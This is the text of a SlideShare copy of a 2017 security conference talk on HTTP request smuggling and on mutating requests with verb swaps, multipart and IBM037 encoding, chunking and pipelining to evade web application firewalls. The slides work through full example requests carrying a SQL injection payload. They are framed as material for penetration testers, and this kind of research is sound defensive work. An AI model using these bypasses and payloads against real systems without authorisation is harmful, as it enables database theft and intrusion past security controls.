SlideShare uma empresa Scribd logo

A Forgotten HTTP Invisibility Cloak

Transferir como PPTX, PDF
Soroush Dalili
Soroush Dalili

This presentation illustrates a number of techniques to smuggle and reshape HTTP requests using features such as HTTP Pipelining that are not normally used by testers. The strange behaviour of web servers with different technologies will be reviewed using HTTP versions 1.1, 1.0, and 0.9 before HTTP v2 becomes too popular! Some of these techniques might come in handy when dealing with a dumb WAF or load balancer that blocks your attacks. Presented @ BSides Manchester 2017 & SteelCon 2017

Internet
1 de 43
A Forgotten HTTP Invisibility Cloak BSides Manchester 2017 – by Soroush Dalili
About Me • A web application security guy • Breaker > Builder • Love to bypass stuff with a single character  • e.g. Remember IIS6 file.asp;.jpg bypass? • Working at NCC Group • Bug bounty hunter where possible! • Twitter: @irsdl
This Talk! • Messing with HTTP… (version < 2) • HTTP Request Smuggling! • Not all new, but forgotten • Lots of heat • We are burning our bypass techniques! • Brain teasers alert! o_x • Boring HTTP requests alert! x_x
Game Changers! • Web Servers (IIS, Apache, …) • Technologies (ASPX, ASP, JSP, …) • Gateways and Proxies • Also important: • Version • Configuration • The same with WAF/IDS
Our Targeted Webservers! • Nginx,uWSGI-Django-Python2 & Python3 • Apache-TOMCAT8-JVM1.8-JSP & TOMCAT7-JVM1.6 • Apache-PHP5 (mod_php & FastCGI) • PHP7.1 on IIS8-FastCGI • ASP Classic on IIS6, 7.5, 8, 10 • ASP.NET on IIS6, 7.5, 8, 10
What The HTTP? • Textual & simple (before version 2) • Apart from version 2 • v1.1 (rfc2068 -> rfc2616 -> rfc7230-7235) • v1.0 (rfc1945) • v0.9 -> not expected to be supported but it still does
HTTP 0.9
A Simple HTTP Request POST /path/sample.aspx?input0=QueryValue HTTP/1.1 HOST: victim.com Cookie: input2=CookieValue Content-Type: application/x-www-form-urlencoded Content-Length: 18 input1=PostValue
Request Mutation • Request A != Request B • Response A == Response B • Perhaps to solve one of these problems: • Browsing your favourite betting site while at work! • Looking at restricted areas of a site! • Fingerprinting the Servers • Cache poisoning, Response Splitting, Socket Buffer Poisoning (e.g. Hiding Wookiees in HTTP – Defcon24) • Bypassing a WAF/IDS during security testing!
WAF in Security Testing!
Common Mutations • Well documented in RFCs… • e.g. Line folding in headers • Common behaviours • /foo/../ in a normal path • URL-encoding • HTML-encoding in XML • etc. etc. • Normally detected by most of the WAFs
Strange Mutations • Needs researching… repurposing! • Some examples to start with: • &==; – Python Django between parameters! • FooBar==POST verb – Apache with PHP • <%I%M%u011e>==<IMG> – IIS ASP Classic • ;/path1;foo/path2;bar/;==/path1/path2/ – Apache Tomcat • Sometimes even against RFC:
IIS 10 ASPX (v4) Test Case – Request A POST /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 41 input1='union all select * from users--
HTTP Verb Replacement • Replacing POST with GET • Works on: • IIS (tested on ASP classic, ASPX, PHP)
Original Request POST /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 41 input1='union all select * from users--
HTTP Verb Replacement GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 41 input1='union all select * from users--
Changing Body Type • File uploads also use “multipart/form-data” • Works on: • Nginx,uWSGI-Django-Python3 • Nginx,uWSGI-Django-Python2 • Apache-PHP5(mod_php) • Apache-PHP5(FastCGI) • IIS (ASPX, PHP)
Previous Request GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 41 input1='union all select * from users--
Changing Body Type GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data; boundary=1 Content-Length: 95 --1 Content-Disposition: form-data; name="input1" 'union all select * from users-- --1--
Removing Unnecessary Parts! • What if we remove some parts of the body? • Removing last “--” in the boundary: • Nginx,uWSGI-Django-Python 2 & 3 • Apache-PHP5(mod_php & FastCGI) • IIS (ASPX, PHP) • Removing “form-data;” from the multipart request: • Apache-PHP5(mod_php & FastCGI) • IIS (ASPX, PHP)
Previous Request GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data; boundary=1 Content-Length: 95 --1 Content-Disposition: form-data; name="input1" 'union all select * from users-- --1--
Removing Unnecessary Parts! GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data; boundary=1 Content-Length: 95 --1 Content-Disposition: name="input1" 'union all select * from users-- --1
Adding Useless Parts! • What if we add some confusing parts? • Additional headers • Duplicated values • Useless stuffs, who cares? • Spacing can be useful too • CRLF after “Content-Disposition:” and before the space • PHP  ASPX 
Previous Request GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data; boundary=1 Content-Length: 95 --1 Content-Disposition: name="input1" 'union all select * from users-- --1
Adding Useless Parts! GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Length: 113 Content-Type: multipart/form-data; boundary=1,boundry=irsdl --1 --1 Content-Disposition: name="input1"; filename ="test.jpg" 'union all select * from users— --1
Changing Request Encoding! • “Content-Type” again… but charset now! • Normally used for responses but • Also works on the requests: • Nginx,uWSGI-Django-Python 2,3 • Apache-TOMCAT 7/8-JVM1.6/1.8-JSP • IIS (ASPX) • Examples: • multipart/form-data; charset=ibm037,boundary=blah • multipart/form-data;boundary=blah;charset=ibm037 • application/x-www-form-urlencoded;charset=ibm037
Previous Request GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Length: 109 Content-Type: multipart/form-data; boundary=1,boundry=irsdl --1 --1 Content-Disposition: name="input1"; filename ="test.jpg" 'union all select * from users— --1
Changing Request Encoding! GET /path/sample.aspx?%89%95%97%A4%A3%F0=%F0 HTTP/1.1 HOST: victim.com Content-Length: 109 Content-Type: multipart/form-data; charset=ibm037, boundary=1,boundry=irsdl --1 --1 Ö•£…•£`ĉ¢—–¢‰£‰–•z@••”…~•‰•—¤£ñ•^@†‰“…••”…@@@~•£…¢£K‘—‡• }¤•‰–•@•““@¢…“…ƒ£@@†™–”@¤¢…™¢`` --1
Encoding Example: Using Python import urllib s = 'Content-Disposition: name="input1"; filename ="test.jpg"' print urllib.quote_plus(s.encode("IBM037")) > %C3%96%95%A3%85%95%A3%60%C4%89%A2%97%96% A2%89%A3%89%96%95z%40%95%81%94%85%7E%7F%89 %95%97%A4%A3%F1%7F%5E%40%86%89%93%85%95%8 1%94%85%40%40%40%7E%7F%A3%85%A2%A3K%91%97 %87%7F
Chunking The Body! • We can go further & further • Transfer-Encoding: chunked • Size in Hex before each part! • Comments after size with a “;” as delimiter • Ends with 0 and a CRLF
Previous Request GET /path/sample.aspx?%89%95%97%A4%A3%F0=%F0 HTTP/1.1 HOST: victim.com Content-Length: 107 Content-Type: multipart/form-data; charset=ibm037, boundary=1,boundry=irsdl --1 --1 Ö•£…•£`ĉ¢—–¢‰£‰–•z@••”…~•‰•—¤£ñ•^@†‰“…••”…@~•£…¢£K‘—‡• }¤•‰–•@•““@¢…“…ƒ£@@†™–”@¤¢…™¢`` --1
Chunked! GET /path/sample.aspx?%89%95%97%A4%A3%F0=%F0 HTTP/1.1 HOST: victim.com Content-Length: 107 Content-Type: multipart/form-data; charset=ibm037, boundary=1,boundry=irsdl Transfer-Encoding: chunked A --1 --1 63 Ö•£…•£`ĉ¢—–¢‰£‰–•z@•�”…~‰•—¤£ñ^@†‰“…•�”…@~£…¢£K‘—‡• }¤•‰–•@�““@¢…“…ƒ£@@†™–”@¤¢…™¢`` --1 0
More Useless Data – Request B GET /path/sample.aspx?%89%95%97%A4%A3%F0=%F0 HTTP/1.1 HOST: victim.com Content-Length: 107 Content-Type: multipart/form-data; charset=ibm037, boundary=1,boundry=irsdl Transfer-Encoding: chunked 0000A ;--irsdl --1 --1 63;--1 Ö•£…•£`ĉ¢—–¢‰£‰–•z@•�”…~‰•—¤£ñ^@†‰“…•�”…@~£…¢£K‘—‡• }¤•‰–•@�““@¢…“…ƒ£@@†™–”@¤¢…™¢`` --1 0;--1--
Remember the Original Request? POST /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 41 input1='union all select * from users--
HTTP Pipelining
HTTP Pipelining • HTTP/1.1 & 1.0 • HTTP 1.0 needs: “Connection: keep-alive” • “Connection: close” stops it (default in 1.0) • Hop by Hop • Still FIFO • 1 HTTP request can contain multiple requests • Content-Length is important if not chunked!
HTTP Pipelining Example POST /sample.aspx?input0=1 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 21 input1=nothingToSee POST /foobar.aspx?input0=2 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 3 A=B …
HTTP Pipelining & HTTP 0.9 POST /sample.aspx?input0=1 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 21 input1=nothingToSee GET https://victim.com/anotherpage.aspx?input=value! • Bypassing default settings of a famous WAF when PATH is forbidden • What about Apache Tomcat?
Pro Tips! • Be smart, there are more techniques, more confusions • But don’t be greedy, perhaps try them separately • Different technologies are different • External WAFs (e.g. cloud based) are easier to bypass • A proxy server can ruin your fun • but can also make it more fun!
http://HTTP.NINJA/ • Work in progress… • Host test files, test cases, results • More tools to come • Needs community participation in near future
Thank You!

Recomendados

Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsneexemil
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypassДмитрий Бумов
 

Recomendados

Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsneexemil
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypassДмитрий Бумов
 
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.Mikhail Egorov
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug BountiesOWASP Nagpur
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceFrans Rosén
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionSoroush Dalili
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...Frans Rosén
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim HegazyHackIT Ukraine
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesFrans Rosén
 
A8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentationA8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentationAlbena Asenova-Belal
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016bugcrowd
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsMikhail Egorov
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryDaniel Miessler
 
Cross Site Request Forgery
Cross Site Request ForgeryCross Site Request Forgery
Cross Site Request ForgeryTony Bibbs
 
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote ShellcodeAj MaChInE
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
 
Lie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsLie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsIvan Novikov
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadSecurity BSides Ahmedabad
 
HTTP Security Headers
HTTP Security HeadersHTTP Security Headers
HTTP Security HeadersIsmael Goncalves
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionVishal Kumar
 
Writing a fast HTTP parser
Writing a fast HTTP parserWriting a fast HTTP parser
Writing a fast HTTP parserfukamachi
 
Data normalization weaknesses
Data normalization weaknessesData normalization weaknesses
Data normalization weaknessesIvan Novikov
 

Mais conteúdo relacionado

Mais procurados

What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.Mikhail Egorov
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug BountiesOWASP Nagpur
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceFrans Rosén
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionSoroush Dalili
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...Frans Rosén
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim HegazyHackIT Ukraine
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesFrans Rosén
 
A8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentationA8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentationAlbena Asenova-Belal
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016bugcrowd
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsMikhail Egorov
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryDaniel Miessler
 
Cross Site Request Forgery
Cross Site Request ForgeryCross Site Request Forgery
Cross Site Request ForgeryTony Bibbs
 
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote ShellcodeAj MaChInE
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
 
Lie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsLie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsIvan Novikov
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionVishal Kumar
 

Mais procurados (20)

What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug Bounties
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webservice
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
 
A8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentationA8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentation
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request Forgery
 
Cross Site Request Forgery
Cross Site Request ForgeryCross Site Request Forgery
Cross Site Request Forgery
 
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPra
 
Lie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsLie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application Firewalls
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides Ahmedabad
 
HTTP Security Headers
HTTP Security HeadersHTTP Security Headers
HTTP Security Headers
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
 

Semelhante a A Forgotten HTTP Invisibility Cloak

Writing a fast HTTP parser
Writing a fast HTTP parserWriting a fast HTTP parser
Writing a fast HTTP parserfukamachi
 
Data normalization weaknesses
Data normalization weaknessesData normalization weaknesses
Data normalization weaknessesIvan Novikov
 
Multi-Layer DDoS Mitigation Strategies
Multi-Layer DDoS Mitigation StrategiesMulti-Layer DDoS Mitigation Strategies
Multi-Layer DDoS Mitigation StrategiesSagi Brody
 
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilitiesVorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilitiesDefconRussia
 
Hacking routers as Web Hacker
Hacking routers as Web HackerHacking routers as Web Hacker
Hacking routers as Web HackerHeadLightSecurity
 
Vulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing LevelsVulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing LevelsPositive Hack Days
 
Vulnerabilities in data processing levels
Vulnerabilities in data processing levelsVulnerabilities in data processing levels
Vulnerabilities in data processing levelsbeched
 
Securing Your Webserver By Pradeep Sharma
Securing Your Webserver By Pradeep SharmaSecuring Your Webserver By Pradeep Sharma
Securing Your Webserver By Pradeep SharmaOSSCube
 
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"Defcon Moscow
 
Webapp security testing
Webapp security testingWebapp security testing
Webapp security testingTomas Doran
 
Webapp security testing
Webapp security testingWebapp security testing
Webapp security testingTomas Doran
 
PLNOG 18 - Paweł Małachowski - Spy hard czyli regexpem po pakietach
PLNOG 18 - Paweł Małachowski - Spy hard czyli regexpem po pakietachPLNOG 18 - Paweł Małachowski - Spy hard czyli regexpem po pakietach
PLNOG 18 - Paweł Małachowski - Spy hard czyli regexpem po pakietachPROIDEA
 
«Scrapy internals» Александр Сибиряков, Scrapinghub
«Scrapy internals» Александр Сибиряков, Scrapinghub«Scrapy internals» Александр Сибиряков, Scrapinghub
«Scrapy internals» Александр Сибиряков, Scrapinghubit-people
 
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon YangPractical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon YangLyon Yang
 
Spy hard, challenges of 100G deep packet inspection on x86 platform
Spy hard, challenges of 100G deep packet inspection on x86 platformSpy hard, challenges of 100G deep packet inspection on x86 platform
Spy hard, challenges of 100G deep packet inspection on x86 platformRedge Technologies
 
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...Felipe Prado
 
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
DEF CON 24 - workshop - Craig Young - brainwashing embedded systemsDEF CON 24 - workshop - Craig Young - brainwashing embedded systems
DEF CON 24 - workshop - Craig Young - brainwashing embedded systemsFelipe Prado
 

Semelhante a A Forgotten HTTP Invisibility Cloak (20)

Writing a fast HTTP parser
Writing a fast HTTP parserWriting a fast HTTP parser
Writing a fast HTTP parser
 
Data normalization weaknesses
Data normalization weaknessesData normalization weaknesses
Data normalization weaknesses
 
Multi-Layer DDoS Mitigation Strategies
Multi-Layer DDoS Mitigation StrategiesMulti-Layer DDoS Mitigation Strategies
Multi-Layer DDoS Mitigation Strategies
 
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilitiesVorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
 
Lecture 7: Server side programming
Lecture 7: Server side programmingLecture 7: Server side programming
Lecture 7: Server side programming
 
Hacking routers as Web Hacker
Hacking routers as Web HackerHacking routers as Web Hacker
Hacking routers as Web Hacker
 
Vulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing LevelsVulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing Levels
 
Vulnerabilities in data processing levels
Vulnerabilities in data processing levelsVulnerabilities in data processing levels
Vulnerabilities in data processing levels
 
Top ten-list
Top ten-listTop ten-list
Top ten-list
 
Securing Your Webserver By Pradeep Sharma
Securing Your Webserver By Pradeep SharmaSecuring Your Webserver By Pradeep Sharma
Securing Your Webserver By Pradeep Sharma
 
Hacking routers as Web Hacker
Hacking routers as Web HackerHacking routers as Web Hacker
Hacking routers as Web Hacker
 
